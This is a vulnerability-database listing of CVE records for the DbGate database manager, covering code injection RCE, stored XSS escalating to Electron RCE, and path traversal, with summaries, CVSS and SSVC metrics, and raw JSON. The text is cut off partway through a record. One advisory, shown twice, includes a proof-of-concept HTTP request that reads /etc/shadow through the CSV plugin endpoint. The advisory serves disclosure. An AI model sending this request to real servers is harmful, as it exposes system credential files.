Search
Find a vulnerability
Search criteria
8 vulnerabilities by dbgate
CVE-2026-48017 (GCVE-0-2026-48017)
Vulnerability from nvd – Published: 2026-06-15 20:54 – Updated: 2026-06-17 03:55
VLAI
Title
DbGate: Remote Code Execution via functionName injection in loadReader endpoint
Summary
DbGate is cross-platform database manager. In versions 7.1.8 and prior, the POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction. An authenticated user with basic access (no admin role, no run-shell-script permission required) can: execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process, read/write any file accessible to the process, pivot to connected databases by reading connection credentials from DbGate's storage, and compromise the host system - in Docker deployments, this typically means root access within the container.
Severity
8.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/releases/tag/v7.1.9 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48017",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-16T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T03:55:47.723Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c 7.1.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 7.1.8 and prior, the POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction. An authenticated user with basic access (no admin role, no run-shell-script permission required) can: execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process, read/write any file accessible to the process, pivot to connected databases by reading connection credentials from DbGate\u0027s storage, and compromise the host system - in Docker deployments, this typically means root access within the container."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-15T20:54:18.858Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385"
},
{
"name": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9"
}
],
"source": {
"advisory": "GHSA-hv83-ggc4-v385",
"discovery": "UNKNOWN"
},
"title": "DbGate: Remote Code Execution via functionName injection in loadReader endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48017",
"datePublished": "2026-06-15T20:54:18.858Z",
"dateReserved": "2026-05-20T17:44:09.586Z",
"dateUpdated": "2026-06-17T03:55:47.723Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34725 (GCVE-0-2026-34725)
Vulnerability from nvd – Published: 2026-04-02 18:02 – Updated: 2026-04-03 03:55
VLAI
Title
dbgate-web: Stored XSS in applicationIcon leads to potential RCE in Electron due to unsafe renderer configuration
Summary
DbGate is cross-platform database manager. From version 7.0.0 to before version 7.1.5, a stored XSS vulnerability exists in DbGate because attacker-controlled SVG icon strings are rendered as raw HTML without sanitization. In the web UI this allows script execution in another user's browser; in the Electron desktop app this can escalate to local code execution because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in version 7.1.5.
Severity
8.3 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/commit/a7d2ed11f… | x_refsource_MISC |
| https://github.com/dbgate/dbgate/releases/tag/v7.1.5 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34725",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-03T03:55:56.991Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003e= 7.0.0, \u003c 7.1.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. From version 7.0.0 to before version 7.1.5, a stored XSS vulnerability exists in DbGate because attacker-controlled SVG icon strings are rendered as raw HTML without sanitization. In the web UI this allows script execution in another user\u0027s browser; in the Electron desktop app this can escalate to local code execution because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in version 7.1.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T18:02:35.720Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-35xm-qvjg-8m42",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-35xm-qvjg-8m42"
},
{
"name": "https://github.com/dbgate/dbgate/commit/a7d2ed11f3f3d4dfb5d2e4e5467dedafa5fa947e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/commit/a7d2ed11f3f3d4dfb5d2e4e5467dedafa5fa947e"
},
{
"name": "https://github.com/dbgate/dbgate/releases/tag/v7.1.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.5"
}
],
"source": {
"advisory": "GHSA-35xm-qvjg-8m42",
"discovery": "UNKNOWN"
},
"title": "dbgate-web: Stored XSS in applicationIcon leads to potential RCE in Electron due to unsafe renderer configuration"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34725",
"datePublished": "2026-04-02T18:02:35.720Z",
"dateReserved": "2026-03-30T18:41:20.753Z",
"dateUpdated": "2026-04-03T03:55:56.991Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-50185 (GCVE-0-2025-50185)
Vulnerability from nvd – Published: 2025-07-26 03:34 – Updated: 2025-07-28 18:55
VLAI
Title
DbGate allows Unauthorized File Access via CSV Plugin
Summary
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.
```
POST /runners/load-reader HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <REPLACE ME>
Content-Type: application/json
Authorization: Bearer <REPLACE ME>
Content-Length: 127
Origin: http://192.168.124.119:3000
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=0
Cache-Control: max-age=0
{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}}
```
The request payload:
Lines of the file being returned:
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-29 - Path Traversal: '..filename'
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/blob/v6.6.0/plug… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-50185",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-28T15:27:58.994623Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-28T18:55:40.184Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c= 6.6.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n\n\n\nLines of the file being returned:\n"
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-29",
"description": "CWE-29: Path Traversal: \u0027..filename\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-26T03:34:43.481Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
},
{
"name": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"
}
],
"source": {
"advisory": "GHSA-7x75-fmx7-q6h9",
"discovery": "UNKNOWN"
},
"title": "DbGate allows Unauthorized File Access via CSV Plugin"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-50185",
"datePublished": "2025-07-26T03:34:43.481Z",
"dateReserved": "2025-06-13T19:17:51.726Z",
"dateUpdated": "2025-07-28T18:55:40.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-50184 (GCVE-0-2025-50184)
Vulnerability from nvd – Published: 2025-07-26 03:27 – Updated: 2025-07-28 15:58
VLAI
Title
DbGate allows for File Traversal via file parameter
Summary
DbGate is cross-platform database manager. In versions 6.4.3-premium-beta.5 and below, DbGate is vulnerable to a directory traversal flaw. The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data. This is fixed in version 6.4.3-beta.8.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-29 - Path Traversal: '..filename'
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/commit/18b11df67… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-50184",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-28T15:58:11.656295Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-28T15:58:17.489Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c 6.4.3-beta.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 6.4.3-premium-beta.5 and below, DbGate is vulnerable to a directory traversal flaw. The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data. This is fixed in version 6.4.3-beta.8."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-29",
"description": "CWE-29: Path Traversal: \u0027..filename\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-26T03:27:05.690Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-2fp9-29gv-p5gm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-2fp9-29gv-p5gm"
},
{
"name": "https://github.com/dbgate/dbgate/commit/18b11df672b5a887bc17a6b9fdd13f9742c8f98e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/commit/18b11df672b5a887bc17a6b9fdd13f9742c8f98e"
}
],
"source": {
"advisory": "GHSA-2fp9-29gv-p5gm",
"discovery": "UNKNOWN"
},
"title": "DbGate allows for File Traversal via file parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-50184",
"datePublished": "2025-07-26T03:27:05.690Z",
"dateReserved": "2025-06-13T19:17:51.726Z",
"dateUpdated": "2025-07-28T15:58:17.489Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-48017 (GCVE-0-2026-48017)
Vulnerability from cvelistv5 – Published: 2026-06-15 20:54 – Updated: 2026-06-17 03:55
VLAI
Title
DbGate: Remote Code Execution via functionName injection in loadReader endpoint
Summary
DbGate is cross-platform database manager. In versions 7.1.8 and prior, the POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction. An authenticated user with basic access (no admin role, no run-shell-script permission required) can: execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process, read/write any file accessible to the process, pivot to connected databases by reading connection credentials from DbGate's storage, and compromise the host system - in Docker deployments, this typically means root access within the container.
Severity
8.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/releases/tag/v7.1.9 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48017",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-16T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T03:55:47.723Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003c 7.1.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. In versions 7.1.8 and prior, the POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction. An authenticated user with basic access (no admin role, no run-shell-script permission required) can: execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process, read/write any file accessible to the process, pivot to connected databases by reading connection credentials from DbGate\u0027s storage, and compromise the host system - in Docker deployments, this typically means root access within the container."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-15T20:54:18.858Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-hv83-ggc4-v385"
},
{
"name": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9"
}
],
"source": {
"advisory": "GHSA-hv83-ggc4-v385",
"discovery": "UNKNOWN"
},
"title": "DbGate: Remote Code Execution via functionName injection in loadReader endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48017",
"datePublished": "2026-06-15T20:54:18.858Z",
"dateReserved": "2026-05-20T17:44:09.586Z",
"dateUpdated": "2026-06-17T03:55:47.723Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34725 (GCVE-0-2026-34725)
Vulnerability from cvelistv5 – Published: 2026-04-02 18:02 – Updated: 2026-04-03 03:55
VLAI
Title
dbgate-web: Stored XSS in applicationIcon leads to potential RCE in Electron due to unsafe renderer configuration
Summary
DbGate is cross-platform database manager. From version 7.0.0 to before version 7.1.5, a stored XSS vulnerability exists in DbGate because attacker-controlled SVG icon strings are rendered as raw HTML without sanitization. In the web UI this allows script execution in another user's browser; in the Electron desktop app this can escalate to local code execution because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in version 7.1.5.
Severity
8.3 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/commit/a7d2ed11f… | x_refsource_MISC |
| https://github.com/dbgate/dbgate/releases/tag/v7.1.5 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34725",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-03T03:55:56.991Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
"vendor": "dbgate",
"versions": [
{
"status": "affected",
"version": "\u003e= 7.0.0, \u003c 7.1.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DbGate is cross-platform database manager. From version 7.0.0 to before version 7.1.5, a stored XSS vulnerability exists in DbGate because attacker-controlled SVG icon strings are rendered as raw HTML without sanitization. In the web UI this allows script execution in another user\u0027s browser; in the Electron desktop app this can escalate to local code execution because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in version 7.1.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T18:02:35.720Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-35xm-qvjg-8m42",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-35xm-qvjg-8m42"
},
{
"name": "https://github.com/dbgate/dbgate/commit/a7d2ed11f3f3d4dfb5d2e4e5467dedafa5fa947e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/commit/a7d2ed11f3f3d4dfb5d2e4e5467dedafa5fa947e"
},
{
"name": "https://github.com/dbgate/dbgate/releases/tag/v7.1.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.5"
}
],
"source": {
"advisory": "GHSA-35xm-qvjg-8m42",
"discovery": "UNKNOWN"
},
"title": "dbgate-web: Stored XSS in applicationIcon leads to potential RCE in Electron due to unsafe renderer configuration"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34725",
"datePublished": "2026-04-02T18:02:35.720Z",
"dateReserved": "2026-03-30T18:41:20.753Z",
"dateUpdated": "2026-04-03T03:55:56.991Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-50185 (GCVE-0-2025-50185)
Vulnerability from cvelistv5 – Published: 2025-07-26 03:34 – Updated: 2025-07-28 18:55
VLAI
Title
DbGate allows Unauthorized File Access via CSV Plugin
Summary
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.
```
POST /runners/load-reader HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <REPLACE ME>
Content-Type: application/json
Authorization: Bearer <REPLACE ME>
Content-Length: 127
Origin: http://192.168.124.119:3000
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=0
Cache-Control: max-age=0
{"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}}
```
The request payload:
Lines of the file being returned:
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-29 - Path Traversal: '..filename'
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/dbgate/dbgate/security/advisor… | x_refsource_CONFIRM |
| https://github.com/dbgate/dbgate/blob/v6.6.0/plug… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-50185",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-28T15:27:58.994623Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-28T18:55:40.184Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dbgate",
